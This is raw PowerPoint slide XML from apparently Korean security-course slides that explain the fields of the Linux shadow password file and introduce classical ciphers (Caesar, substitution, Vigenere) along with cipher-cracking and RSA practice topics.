                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> $Salt $Hash </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>vlaue</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>3.Last Changed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans KR"/>
                        </a:rPr>
                        <a:t>17374</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>: 1970</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>년부터 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>월 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>일부터 패스워드가 수정된 날짜의 일수를 계산</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>4.Minimum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans KR"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>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패스워드가 변경되기 전 최소 사용기간</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일수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>5.Maximum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans KR"/>
                        </a:rPr>
                        <a:t>99999</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>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패스워드 변경 전 최대 사용기간</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일수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>6.Warn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans KR"/>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>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패스워드 사용 만기일 전에 경고 메시지를 제공하는 일수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>7.Inactive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </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로그인 접속 차단 일 수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8.Expire</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>()</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로그인 사용을 금지하는 일 수 </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월</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일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>연도</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>9.Reserved</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>사용되지 않음</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="180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/Theory/T4 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>고전암호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Ceasar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카이사르 암호 </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hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Substitution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치환 암호</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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Vigenere</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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 암호</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>CeasarDeep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카이사르 암호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심화</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>SubstitutionDeep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치환 암호 심화</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>암호 기술 실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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고전암호 크래킹</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>     - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>카이사르 암호</a:t>
                      </a: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치환암호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 암호</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>고전암호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36146124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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>암호 실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>• </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>시저</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>rsa</a:t>
                      </a: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암호 실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>암호 실습</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26915567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/Theory/T4/Ceasar </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>카이사르 암호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>암호화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
